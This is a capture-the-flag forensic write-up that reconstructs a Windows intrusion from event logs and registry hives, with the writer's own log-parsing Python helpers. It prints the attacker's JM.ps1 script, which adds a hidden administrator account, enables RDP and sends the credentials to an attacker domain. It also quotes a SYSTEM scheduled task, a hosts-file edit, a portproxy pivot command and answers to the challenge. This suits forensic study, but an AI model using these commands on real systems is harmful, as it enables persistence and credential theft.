the enduring echo
this one is still an easy challenge, but it requires some extra steps (and tools). it's dfir...

Difficulty: Easy
Narrative:
LeStrade passes disk image artifacts to Watson. It's one of the identified breach points, now showing abnormal CPU activity and anomalies in process logs.

at this point i wonder why the s was uppercase...
tldr;
1. What was the first (non cd) command executed by the attacker on the host? (string)
   answer: systeminfo
   how: evtx timeline - filter Event ID 4688 (Process Creation), sort by time, find earliest non-cd command in Details field
2. What was the parent process spawning the attacker's commands? (C:\FOLDER\PATH\FILE.ext)
   answer: C:\Windows\System32\wbem\WmiPrvSE.exe
   how: same 4688 events - check ExtraFieldInfo field for ParentProcessName - WMI Provider Host indicates WMI-based execution
3. Which remote-execution tool was most likely used for the attack? (filename.ext)
   answer: wmiexec.py
   how: command pattern in 4688: cmd.exe /Q /c <cmd> 1> \\127.0.0.1\ADMIN$\__... with WmiPrvSE parent = classic Impacket wmiexec signature
4. What was the attacker's IP address? (IPv4 address)
   answer: 10.129.242.110
   how: Defender log shows hosts file modification: echo 10.129.242.110 NapoleonsBlackPearl.htb >> C:\Windows\System32\drivers\etc\hosts
5. What is the first element in the attacker's sequence of persistence mechanisms? (string)
   answer: SysHelper Update
   how: scheduled task creation in Defender log + task file C:\Windows\System32\Tasks\SysHelper Update with 2-minute repetition
6. Identify the script executed by the persistence mechanism. (C:\FOLDER\PATH\FILE.ext)
   answer: C:\Users\Werni\AppData\Local\JM.ps1
   how: task XML arguments field contains -File C:\Users\Werni\Appdata\Local\JM.ps1 - executed by scheduled task
7. What local account did the attacker create? (string)
   answer: svc_netupd
   how: JM.ps1 script contains username array, creates random user from @("svc_netupd", "svc_dns", "sys_helper", "WinTelemetry", "UpdaterSvc")
8. What domain name did the attacker use for credential exfiltration? (domain)
   answer: NapoleonsBlackPearl.htb
   how: JM.ps1 script contains Invoke-WebRequest -Uri "http://NapoleonsBlackPearl.htb/Exchange?data=..." for exfiltration
9. What password did the attacker's script generate for the newly created user? (string)
   answer: Watson_20250824160509
   how: password format Watson_YYYYMMDDHHMMSS, derived from first JM.ps1 Engine Start timestamp in Event 400
10. What was the IP address of the internal system the attacker pivoted to? (IPv4 address)
   answer: 192.168.1.101
   how: SSH known_hosts file contains target IP: C:\Users\Administrator\.ssh\known_hosts first line
11. Which TCP port on the victim was forwarded to enable the pivot? (port 0-65565)
   answer: 9999
   how: evtx timeline shows netsh interface portproxy add command with listenport=9999
12. What is the full registry path that stores persistent IPv4→IPv4 TCP listener-to-target mappings? (HKLM\...\...)
   answer: HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp
   how: standard Windows registry location for netsh interface portproxy persistent entries
13. What is the MITRE ATT&CK ID associated with the previous technique used by the attacker to pivot to the internal system? (Txxxx.xxx)
   answer: T1090.001
   how: port forwarding via compromised host = Internal Proxy sub-technique of T1090 (Proxy)
14. Before the attack, the administrator configured Windows to capture command line details in the event logs. What command did they run to achieve this? (command)
   answer: reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
   how: registry modification to enable command-line capture in Event ID 4688 - why we can see full commands in timeline
what we have?
we inherit a cold image of a workstation: HEISEN-9-WS-6, a windows 10 box that may have been compromised. one responder ran kape (kroll artifact parser and extractor) to sweep the C:\ drive. those kape logs show what was copied, what wasn't, and under what constraints. we again focus on the event logs (lol 🐧). there are plenty of tools you can use to convert the evtx files into something readable; while solving this challenge I used hayabusa and python-evtx. pipe the evtxs into a single timeline, and from that river of events we reconstruct the whole incident.
besides the cold image we also have some kape logs:
2025-08-25T20_20_59_5246365_ConsoleLog.txt: responder kape run log (host identity, command line, targets, second-by-second copy narrative)
2025-08-25T20_20_59_5246365_CopyLog.csv: ledger of each source file copied, destination path, timestamps
2025-08-25T20_20_59_5246365_SkipLog.csv.csv: items kape could not copy (locked / unauthorized / excluded). the double extension is unexplained
solulu
flag 1
What was the first (non cd) command executed by the attacker on the host? (string)
this turned out more interesting than it first looked. I temporarily solved some easier questions (I actually got flag 14 before this one). lesson learned: read all questions in a sherlock before diving in chronologically. I confirmed the real starting point when I found this evidence at:
The_Enduring_Echo/C/Users/Administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt
command-line logging had been enabled, which is why we later see full 4688 command lines:

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f

next, I passed the evtx files to hayabusa to build a consolidated csv timeline. you could use EvtxECmd or any evtx parser; I used hayabusa plus a small python-evtx script (usage below).

./hayabusa-3.5.0-lin-x64-gnu csv -d 'The_Enduring_Echo/C/Windows/System32/winevt/logs' -o haya.csv

open that in a sheet; target security event id 4688 (process creation), since the admin enabled command-line capture. sort by time; the earliest non cd command is the flag.

I will also show the alternative if you prefer python:
# pip install python-evtx
python q1.py The_Enduring_Echo/C/Windows/System32/winevt/logs/Security.evtx > Security.xml
# and then grep all the commands
cat Security.xml | grep 'CommandLine.*127\.0\.0\.1' > Command.xml
flag: systeminfo
flag 2
Which parent process (full path) spawned the attacker’s commands? (C:\FOLDER\PATH\FILE.ext)
all attacker commands share the same parent process. just filter / search once to confirm consistency.

flag: C:\Windows\System32\wbem\WmiPrvSE.exe
flag 3
Which remote-execution tool was most likely used for the attack? (filename.ext)
wasn't sure at first, so I searched.

after some reading, the tool is clearly wmiexec.py, based on two criteria:
first, the parent process is WmiPrvSE.exe, which confirms a WMI-based execution channel.
second, the commands redirect output to \\127.0.0.1\ADMIN$\__..., a distinctive pattern used by Impacket's wmiexec.py to collect stdout/stderr via the target's ADMIN$ share.
flag: wmiexec.py
flag 4
What was the attacker’s IP address? (IPv4 address)

reviewing the commands the attacker ran, we quickly identify the one that adds the ip + domain into the hosts file. from that we track the exact instance:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}"></Provider>
<EventID Qualifiers="">4688</EventID>
<Version>2</Version>
<Level>0</Level>
<Task>13312</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2025-08-24 23:00:15.200260+00:00"></TimeCreated>
<EventRecordID>4414</EventRecordID>
<Correlation ActivityID="" RelatedActivityID=""></Correlation>
<Execution ProcessID="4" ThreadID="5688"></Execution>
<Channel>Security</Channel>
<Computer>Heisen-9-WS-6</Computer>
<Security UserID=""></Security>
</System>
<EventData><Data Name="SubjectUserSid">S-1-5-20</Data>
<Data Name="SubjectUserName">HEISEN-9-WS-6$</Data>
<Data Name="SubjectDomainName">WORKGROUP</Data>
<Data Name="SubjectLogonId">0x00000000000003e4</Data>
<Data Name="NewProcessId">0x000000000000150c</Data>
<Data Name="NewProcessName">C:\Windows\System32\cmd.exe</Data>
<Data Name="TokenElevationType">%%1936</Data>
<Data Name="ProcessId">0x0000000000000f34</Data>
<Data Name="CommandLine">cmd.exe /Q /c cmd /C "echo 10.129.242.110 NapoleonsBlackPearl.htb >> C:\Windows\System32\drivers\etc\hosts" 1> \\127.0.0.1\ADMIN$\__1756075857.955773 2>&1</Data>
<Data Name="TargetUserSid">S-1-0-0</Data>
<Data Name="TargetUserName">Werni</Data>
<Data Name="TargetDomainName">HEISEN-9-WS-6</Data>
<Data Name="TargetLogonId">0x00000000004373b0</Data>
<Data Name="ParentProcessName">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name="MandatoryLabel">S-1-16-12288</Data>
</EventData>
</Event>
also, nice reference to the NapoleonsBlackPearl.
flag: 10.129.242.110
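flags 1 to 4 all come out of the same 4688 records, so here is one added example (my code, not the author's q1.py, and not HTB or Impacket code) that does the steps above programmatically: it parses an XML dump of Security.evtx in the shape python-evtx produces, sorts the 4688 records by time, strips the wmiexec wrapper to find the first non-cd command, collects the parent processes, checks every record against the wmiexec signature, and pulls the ip/hostname pair out of the hosts-file echo. the records in SAMPLE_XML are constructed for the example (trimmed to the fields used, with the same namespace and field names as the event quoted above); the assumption is that the dump holds one <Event> element per record, as that event shows.

```python
# Added example, not the author's q1.py: parse a python-evtx style XML dump of
# Security.evtx and answer flags 1-4 from its Event ID 4688 records.
import re
import xml.etree.ElementTree as ET
from datetime import datetime

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Impacket's wmiexec.py wraps each command like this and reads the output back
# through the ADMIN$ share; the named group is what the operator actually ran.
WMIEXEC_RE = re.compile(
    r"^cmd\.exe /Q /c (?P<inner>.*?) 1> \\\\127\.0\.0\.1\\ADMIN\$\\__\d+\.\d+ 2>&1$"
)
# "echo <ip> <hostname> >> ...\etc\hosts" as seen in the flag 4 event.
HOSTS_EDIT_RE = re.compile(r"echo (\d{1,3}(?:\.\d{1,3}){3}) (\S+) >> \S*\\etc\\hosts")

# Constructed sample in the shape of the record quoted above, trimmed to the
# fields this example uses: one logon event and three wmiexec-style 4688s.
SAMPLE_XML = r"""
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System>
<EventID Qualifiers="">4624</EventID>
<TimeCreated SystemTime="2025-08-24 22:59:50.000000+00:00"></TimeCreated>
</System><EventData><Data Name="TargetUserName">Werni</Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System>
<EventID Qualifiers="">4688</EventID>
<TimeCreated SystemTime="2025-08-24 22:59:58.000000+00:00"></TimeCreated>
</System><EventData>
<Data Name="NewProcessName">C:\Windows\System32\cmd.exe</Data>
<Data Name="CommandLine">cmd.exe /Q /c cd C:\Users 1> \\127.0.0.1\ADMIN$\__1756075690.111111 2>&amp;1</Data>
<Data Name="ParentProcessName">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
</EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System>
<EventID Qualifiers="">4688</EventID>
<TimeCreated SystemTime="2025-08-24 23:00:02.000000+00:00"></TimeCreated>
</System><EventData>
<Data Name="NewProcessName">C:\Windows\System32\cmd.exe</Data>
<Data Name="CommandLine">cmd.exe /Q /c systeminfo 1> \\127.0.0.1\ADMIN$\__1756075700.222222 2>&amp;1</Data>
<Data Name="ParentProcessName">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
</EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System>
<EventID Qualifiers="">4688</EventID>
<TimeCreated SystemTime="2025-08-24 23:00:15.200260+00:00"></TimeCreated>
</System><EventData>
<Data Name="NewProcessName">C:\Windows\System32\cmd.exe</Data>
<Data Name="CommandLine">cmd.exe /Q /c cmd /C "echo 10.129.242.110 NapoleonsBlackPearl.htb >> C:\Windows\System32\drivers\etc\hosts" 1> \\127.0.0.1\ADMIN$\__1756075857.955773 2>&amp;1</Data>
<Data Name="ParentProcessName">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
</EventData></Event>
"""


def parse_events(xml_text):
    """One dict per <Event>: event_id, time, and every EventData field by name."""
    events = []
    for chunk in re.findall(r"<Event\b.*?</Event>", xml_text, re.S):
        root = ET.fromstring(chunk)
        stamp = root.find("e:System/e:TimeCreated", NS).get("SystemTime")
        fields = {d.get("Name"): (d.text or "")
                  for d in root.findall("e:EventData/e:Data", NS)}
        events.append({"event_id": int(root.findtext("e:System/e:EventID", namespaces=NS)),
                       "time": datetime.fromisoformat(stamp), **fields})
    return events


def process_creations(events):
    """4688 records in time order, the same timeline the writeup sorts in a sheet."""
    return sorted((e for e in events if e["event_id"] == 4688), key=lambda e: e["time"])


def inner_command(cmdline):
    """Strip the wmiexec wrapper; anything not wrapped is returned unchanged."""
    m = WMIEXEC_RE.match(cmdline)
    return m.group("inner") if m else cmdline


def first_non_cd_command(events):
    """Flag 1: earliest process creation whose real command is not a cd."""
    for e in process_creations(events):
        inner = inner_command(e.get("CommandLine", ""))
        tokens = inner.split()
        if tokens and tokens[0].lower() != "cd":
            return inner
    return None


def parent_processes(events):
    """Flag 2: collapses to a single path when one tool drove everything."""
    return {e.get("ParentProcessName", "") for e in process_creations(events)}


def looks_like_wmiexec(event):
    """Flag 3 signature: WmiPrvSE.exe parent plus ADMIN$ output redirection."""
    parent = event.get("ParentProcessName", "").lower()
    return (parent.endswith(r"\wbem\wmiprvse.exe")
            and WMIEXEC_RE.match(event.get("CommandLine", "")) is not None)


def hosts_file_edits(events):
    """Flag 4: (ip, hostname) pairs the attacker appended to the hosts file."""
    found = []
    for e in process_creations(events):
        m = HOSTS_EDIT_RE.search(e.get("CommandLine", ""))
        if m:
            found.append(m.groups())
    return found


if __name__ == "__main__":
    evs = parse_events(SAMPLE_XML)  # for the real thing: open("Security.xml").read()
    print("flag 1:", first_non_cd_command(evs))
    print("flag 2:", parent_processes(evs))
    print("flag 3 signature on all 4688s:", all(looks_like_wmiexec(e) for e in process_creations(evs)))
    print("flag 4:", hosts_file_edits(evs))
```

run it against the real dump by swapping SAMPLE_XML for the file contents; if parent_processes() returns more than one path, the extra parents are worth a look before trusting the wmiexec attribution.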
flag 5
What is the first element in the attacker's sequence of persistence mechanisms? (string)
tbh — I got the answer by some wild guessing at first. from the previous challenge — the card — we know that we have received a "greeting" from JM, so I simply traced for any JM in this project.

And yur....I noted 2 files down, the MPLog-20250421-104305.log and the SysHelper Update in the Windows\System32\Tasks\ directory. Of course, we already have all the commands executed by the attacker from flag 2. These 2 files helped confirm my answer when I finally shifted my focus to this command:
<Data Name="CommandLine">cmd.exe /Q /c schtasks /create /tn "SysHelper Update" /tr "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Werni\Appdata\Local\JM.ps1" /sc minute /mo 2 /ru SYSTEM /f 1> \\127.0.0.1\ADMIN$\__1756076432.886685 2>&1</Data>
the CopyLog timestamp cluster (ModifiedOnUtc for the task file), 2025-08-24 23:03:50.3672980, aligns exactly with the Defender log. Hence the answer is "SysHelper Update". the other persistence (e.g., port proxy registry entries or additional tasks) occurs after this (see the answers for Q11/Q12), making SysHelper Update the starting point in the persistence chain.
flag: SysHelper Update
flag 6
Identify the script executed by the persistence mechanism. (C:\FOLDER\PATH\FILE.ext)
flags 5 and 6 go hand in hand. same command, same time, when the script JM.ps1 first loaded.
<Data Name="CommandLine">cmd.exe /Q /c schtasks /create /tn "SysHelper Update" /tr "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\Werni\Appdata\Local\JM.ps1" /sc minute /mo 2 /ru SYSTEM /f 1> \\127.0.0.1\ADMIN$\__1756076432.886685 2>&1</Data>
flag: C:\Users\Werni\AppData\Local\JM.ps1
flag 7
What local account did the attacker create? (string)
well...since we know the script, it's time for us to investigate it!
# JM.ps1
# List of potential usernames
$usernames = @("svc_netupd", "svc_dns", "sys_helper", "WinTelemetry", "UpdaterSvc")
# Check for existing user
$existing = $usernames | Where-Object {
    Get-LocalUser -Name $_ -ErrorAction SilentlyContinue
}
# If none exist, create a new one
if (-not $existing) {
    $newUser = Get-Random -InputObject $usernames
    $timestamp = (Get-Date).ToString("yyyyMMddHHmmss")
    $password = "Watson_$timestamp"
    $securePass = ConvertTo-SecureString $password -AsPlainText -Force
    New-LocalUser -Name $newUser -Password $securePass -FullName "Windows Update Helper" -Description "System-managed service account"
    Add-LocalGroupMember -Group "Administrators" -Member $newUser
    Add-LocalGroupMember -Group "Remote Desktop Users" -Member $newUser
    # Enable RDP
    Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 0
    Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
    Invoke-WebRequest -Uri "http://NapoleonsBlackPearl.htb/Exchange?data=$([Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("$newUser|$password")))" -UseBasicParsing -ErrorAction SilentlyContinue | Out-Null
}
although we have a list of potential usernames, the only username that appears in our logs is svc_netupd

the answer is confirmed from both the hayabusa timeline (the entire log folder) and the evtx parser output (just Security.evtx):

<EventData><Data Name="TargetUserName">svc_netupd</Data>
<Data Name="TargetDomainName">HEISEN-9-WS-6</Data>
<Data Name="TargetSid">S-1-5-21-3871582759-1638593395-315824688-1003</Data>
<Data Name="SubjectUserSid">S-1-5-18</Data>
<Data Name="SubjectUserName">HEISEN-9-WS-6$</Data>
<Data Name="SubjectDomainName">WORKGROUP</Data>
<Data Name="SubjectLogonId">0x00000000000003e7</Data>
<Data Name="PrivilegeList">-</Data>
<Data Name="SamAccountName">svc_netupd</Data>
<Data Name="DisplayName">%%1793</Data>
<Data Name="UserPrincipalName">-</Data>
<Data Name="HomeDirectory">%%1793</Data>
<Data Name="HomePath">%%1793</Data>
<Data Name="ScriptPath">%%1793</Data>
<Data Name="ProfilePath">%%1793</Data>
<Data Name="UserWorkstations">%%1793</Data>
<Data Name="PasswordLastSet">%%1794</Data>
<Data Name="AccountExpires">%%1794</Data>
<Data Name="PrimaryGroupId">513</Data>
<Data Name="AllowedToDelegateTo">-</Data>
<Data Name="OldUacValue">0x0</Data>
<Data Name="NewUacValue">0x15</Data>
<Data Name="UserAccountControl">
%%2080
%%2082
%%2084</Data>
<Data Name="UserParameters">%%1793</Data>
<Data Name="SidHistory">-</Data>
<Data Name="LogonHours">%%1797</Data>
</EventData>
</Event>
flag: svc_netupd
flag 8
What domain name did the attacker use for credential exfiltration? (domain)
present in the JM.ps1 exfil HTTP request:
Invoke-WebRequest -Uri "http://NapoleonsBlackPearl.htb/Exchange?data=$([Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("$newUser|$password")))" -UseBasicParsing -ErrorAction SilentlyContinue | Out-Null
what it's doing: the hosts-file modification seen in the Defender log (which precedes the task creation, see Q4) inserts a mapping for this same domain, so the name resolves to the attacker's IP. the domain is used to receive the Base64-encoded username|password pair.
flag: NapoleonsBlackPearl.htb
flag 9
What password did the attacker's script generate for the newly created user? (string)
I've seen a lot of people struggle with this, so the discord channel got some pretty interesting stuff going, but because of that it saved me from wasting time 😭. Essentially we now know, thanks to Discord, that the timezone is UTC, and from our log we know that the user was created at 2025-08-24T23:05:09.764658Z.
But well, this is where people struggle: the time zone on the workstation HEISEN-9-WS-6 is different from UTC, so to pinpoint this we have to figure out what timezone the machine is operating on. There are multiple ways to achieve this; I guess I went the long way.
# sudo apt install reglookup
❯ reglookup -p '/ControlSet001/Control/TimeZoneInformation' The_Enduring_Echo/C/Windows/System32/config/SYSTEM
PATH,TYPE,VALUE,MTIME
/ControlSet001/Control/TimeZoneInformation,KEY,,2025-04-21 18:42:48
/ControlSet001/Control/TimeZoneInformation/Bias,DWORD,0x000001E0,
/ControlSet001/Control/TimeZoneInformation/DaylightBias,DWORD,0xFFFFFFC4,
/ControlSet001/Control/TimeZoneInformation/DaylightName,SZ,@tzres.dll%2C-211,
/ControlSet001/Control/TimeZoneInformation/DaylightStart,BINARY,%00%00%03%00%02%00%02%00%00%00%00%00%00%00%00%00,
/ControlSet001/Control/TimeZoneInformation/StandardBias,DWORD,0x00000000,
/ControlSet001/Control/TimeZoneInformation/StandardName,SZ,@tzres.dll%2C-212,
/ControlSet001/Control/TimeZoneInformation/StandardStart,BINARY,%00%00%0B%00%01%00%02%00%00%00%00%00%00%00%00%00,
/ControlSet001/Control/TimeZoneInformation/TimeZoneKeyName,SZ,Pacific Standard Time,
/ControlSet001/Control/TimeZoneInformation/DynamicDaylightTimeDisabled,DWORD,0x00000000,
/ControlSet001/Control/TimeZoneInformation/ActiveTimeBias,DWORD,0x000001A4,
This returns Pacific Standard Time (PST). ActiveTimeBias 0x1A4 is 420 minutes (Bias 480 plus DaylightBias -60, so daylight saving was in effect), i.e. UTC-7, so we subtract 7 hours from the UTC creation time: 23:05:09 UTC becomes 16:05:09 local, and donezo, we got our password.
flag: Watson_20250824160509
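here is an added example (mine, not the author's workflow) that does the timezone maths from the reglookup values above instead of by hand: it reads the reglookup csv rows, decodes the signed DWORD biases, checks ActiveTimeBias against Bias+DaylightBias and Bias+StandardBias to confirm which rule was in force, and rebuilds the password from the 4720 creation timestamp quoted earlier. REGLOOKUP_OUTPUT is an excerpt of the output above; the assumption is that the DST state at the time the hive was last written (the key's MTIME is 2025-04-21, already in daylight time) matches the incident date in August.

```python
# Added example (not the author's workflow): derive the workstation's local time,
# and so the JM.ps1 password, from the TimeZoneInformation values reglookup printed.
import csv
from datetime import datetime, timedelta, timezone

# Excerpt of the reglookup output shown above (only the rows this example needs).
REGLOOKUP_OUTPUT = """\
PATH,TYPE,VALUE,MTIME
/ControlSet001/Control/TimeZoneInformation/Bias,DWORD,0x000001E0,
/ControlSet001/Control/TimeZoneInformation/DaylightBias,DWORD,0xFFFFFFC4,
/ControlSet001/Control/TimeZoneInformation/StandardBias,DWORD,0x00000000,
/ControlSet001/Control/TimeZoneInformation/TimeZoneKeyName,SZ,Pacific Standard Time,
/ControlSet001/Control/TimeZoneInformation/ActiveTimeBias,DWORD,0x000001A4,
"""

# User-creation time from the 4720 event quoted earlier (UTC).
USER_CREATED_UTC = datetime(2025, 8, 24, 23, 5, 9, 764658, tzinfo=timezone.utc)


def parse_reglookup(text):
    """Map value name -> (type, raw value) for every row under the key."""
    return {row["PATH"].rsplit("/", 1)[-1]: (row["TYPE"], row["VALUE"])
            for row in csv.DictReader(text.splitlines())}


def signed_dword(hex_text):
    """Registry DWORDs print unsigned; the bias values are signed minutes."""
    value = int(hex_text, 16)
    return value - (1 << 32) if value & 0x80000000 else value


def active_offset(values):
    """Return (offset, mode): the timedelta to subtract from UTC, and whether the
    machine was on daylight or standard time.  Windows defines UTC = local + bias,
    so a positive bias means the clock is west of UTC."""
    bias = signed_dword(values["Bias"][1])
    standard = bias + signed_dword(values["StandardBias"][1])
    daylight = bias + signed_dword(values["DaylightBias"][1])
    active = signed_dword(values["ActiveTimeBias"][1])
    # ActiveTimeBias is the bias that was in force when the key was last written,
    # so cross-check it against the two rules before trusting it for another date.
    if active == daylight:
        return timedelta(minutes=active), "daylight"
    if active == standard:
        return timedelta(minutes=active), "standard"
    raise ValueError("ActiveTimeBias %d matches neither rule" % active)


def to_local(utc_dt, values):
    offset, _ = active_offset(values)
    return utc_dt - offset


def jm_password(created_utc, values):
    """Rebuild the Watson_yyyyMMddHHmmss string JM.ps1 derived from Get-Date."""
    return "Watson_" + to_local(created_utc, values).strftime("%Y%m%d%H%M%S")


if __name__ == "__main__":
    tz = parse_reglookup(REGLOOKUP_OUTPUT)
    print(tz["TimeZoneKeyName"][1], active_offset(tz))
    print(jm_password(USER_CREATED_UTC, tz))
```

if the hive had last been written during standard time and the incident fell in daylight time (or the other way round), active_offset() would pick the wrong rule; in that case use the DaylightStart/StandardStart SYSTEMTIME values to work out which rule applied on the incident date.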
flag 10
What was the IP address of the internal system the attacker pivoted to? (IPv4 address)
I solved this by finding this file:
❯ cat C/Users/Administrator/.ssh/known_hosts
192.168.1.101 ecdsa-sha2-nistp256 [truncated]
It seems that JM (my dude) is operating as Administrator, and almost certainly invoked the Windows OpenSSH client (C:\Windows\System32\OpenSSH\ssh.exe) to connect to the internal system at 192.168.1.101:22. On a successful SSH handshake, the server's host key was written to the known_hosts file.
Wondering what this ip is, I searched for it in the folder using fuzzy search. What ultimately caught my eye is this specific command in the log we parsed from Security.evtx:
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress=192.168.1.101 connectport=22
Well, with this command, and at this point into the sherlock, we have uncovered the full mystery. That is why known_hosts records the 192.168.1.101 ip: that host is what they were after. After their cd, systeminfo, directory poking, scheduled task and firewall disable, their final intent is revealed. This command creates a persistent TCP listener on the compromised host (all local IPv4 interfaces, port 9999) that silently forwards every inbound connection to 192.168.1.101:22 (SSH) inside the network, turning the victim into a relay (an internal proxy) so JM can reach the internal SSH service as if it were exposed externally.
flag: 192.168.1.101
flag 11
Which TCP port on the victim was forwarded to enable the pivot? (port 0-65565)
From the explanation above, port 9999
flag: 9999
flag 12
What is the full registry path that stores persistent IPv4→IPv4 TCP listener-to-target mappings? (HKLM......)
Since it is a registry path, where else would we look but the SYSTEM hive, hoho.
❯ reglookup C/Windows/System32/config/SYSTEM 2>&1 | grep v4tov4
/ControlSet001/Services/PortProxy/v4tov4,KEY,,2025-08-24 23:10:05
/ControlSet001/Services/PortProxy/v4tov4/tcp,KEY,,2025-08-24 23:10:05
/ControlSet001/Services/PortProxy/v4tov4/tcp/0.0.0.0%2F9999,SZ,192.168.1.101/22,
flag: HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp
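as an added example (not the author's), here is a small parser that turns reglookup output for the PortProxy key into listener-to-target mappings, so the same check can be run over any SYSTEM hive during triage: reglookup percent-encodes the slash inside the value name (%2F), so the listener part is decoded before it is split into address and port, and the KEY rows are skipped because only the SZ values are actual rules. REGLOOKUP_PORTPROXY copies the three lines shown above.

```python
# Added example (not the author's): audit reglookup output for persistent
# netsh portproxy rules and report them as listener -> target mappings.
import csv
from urllib.parse import unquote

PORTPROXY_PREFIX = "/ControlSet001/Services/PortProxy/"

# The three lines from the reglookup | grep v4tov4 output above.
REGLOOKUP_PORTPROXY = """\
PATH,TYPE,VALUE,MTIME
/ControlSet001/Services/PortProxy/v4tov4,KEY,,2025-08-24 23:10:05
/ControlSet001/Services/PortProxy/v4tov4/tcp,KEY,,2025-08-24 23:10:05
/ControlSet001/Services/PortProxy/v4tov4/tcp/0.0.0.0%2F9999,SZ,192.168.1.101/22,
"""


def split_endpoint(text):
    """'0.0.0.0/9999' -> ('0.0.0.0', 9999); rsplit keeps IPv6 addresses whole."""
    addr, port = text.rsplit("/", 1)
    return addr, int(port)


def portproxy_rules(reglookup_text):
    """One dict per SZ value under PortProxy; the KEY rows are just containers."""
    rules = []
    for row in csv.DictReader(reglookup_text.splitlines()):
        path = row["PATH"]
        if not path.startswith(PORTPROXY_PREFIX) or row["TYPE"] != "SZ":
            continue
        # e.g. v4tov4/tcp/0.0.0.0%2F9999 -> family, protocol, encoded listener
        family, proto, listener = path[len(PORTPROXY_PREFIX):].split("/", 2)
        listen_addr, listen_port = split_endpoint(unquote(listener))
        connect_addr, connect_port = split_endpoint(row["VALUE"])
        rules.append({
            "key": path.rsplit("/", 1)[0],   # the hive key holding this rule
            "family": family, "proto": proto,
            "listen_addr": listen_addr, "listen_port": listen_port,
            "connect_addr": connect_addr, "connect_port": connect_port,
            "mtime": row["MTIME"],
        })
    return rules


def describe(rule):
    return "%s %s: %s:%d -> %s:%d" % (rule["proto"], rule["family"],
                                     rule["listen_addr"], rule["listen_port"],
                                     rule["connect_addr"], rule["connect_port"])


def bound_to_all_interfaces(rule):
    """A 0.0.0.0 or :: listener exposes the forwarder on every interface."""
    return rule["listen_addr"] in ("0.0.0.0", "::")


if __name__ == "__main__":
    for r in portproxy_rules(REGLOOKUP_PORTPROXY):
        flag = " (listens on all interfaces)" if bound_to_all_interfaces(r) else ""
        print(describe(r) + flag, "from", r["key"])
```

on a live system the same data sits under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy; in an offline hive, ControlSet001 is only the right control set if HKLM\SYSTEM\Select\Current points at it, which is worth checking before reporting a rule as active.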
flag 13
What is the MITRE ATT&CK ID associated with the previous technique used by the attacker to pivot to the internal system? (Txxxx.xxx)
Proxy (T1090) Sub-technique: Internal Proxy (T1090.001) — using a compromised host to proxy traffic to internal resources (here via netsh interface portproxy). Reference at:
flag: T1090.001
flag 14
Before the attack, the administrator configured Windows to capture command line details in the event logs. What command did they run to achieve this? (command)
As mentioned in flag 1, I got this piece of evidence first, to confirm some of my assumptions. Gladly, I will repeat the answer from ConsoleHost_history.txt:
ipconfig
powershell New-NetIPAddress -InterfaceAlias "Ethernet0" -IPAddress 172.18.6.3 -PrefixLength 24
ipconfig.exe
powershell New-NetIPAddress -InterfaceAlias "Ethernet0" -IPAddress 10.129.233.246 -PrefixLength 24
ipconfig
ncpa.cpl
ipconfig
ping 1.1.1.1
cd C:\Users\
ls
net user Werni Quantum1! /add
ls
net localgroup administrator Werni /add
net localgroup Administrators Werni /add
clear
wmic computersystem where name="%COMPUTERNAME%" call rename name="Heisen-9-WS-6"
ls
cd ..
ls
cd .\Users\
ls
net users
Rename-Conputer -NewName "Heisen-9-WS-6" -Force
Rename-Computer -NewName "Heisen-9-WS-6" -Force
net users
ls
net user felamos /delete
cd ..
ls
net users
cat .\Werni\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
Enable-NetFirewallRule -DisplayGroup "Windows Management Instrumentation (WMI)"
Enable-NetFirewallRule -DisplayGroup "Remote Event Log Management"
Enable-NetFirewallRule -DisplayGroup "Remote Service Management"
auditpol /set /subcategory:"Process Creation" /success:enable
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
Set-MpPreference -DisableRealtimeMonitoring $true
Get-MpComputerStatus | Select-Object AMRunningMode, RealTimeProtectionEnabled
flag: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
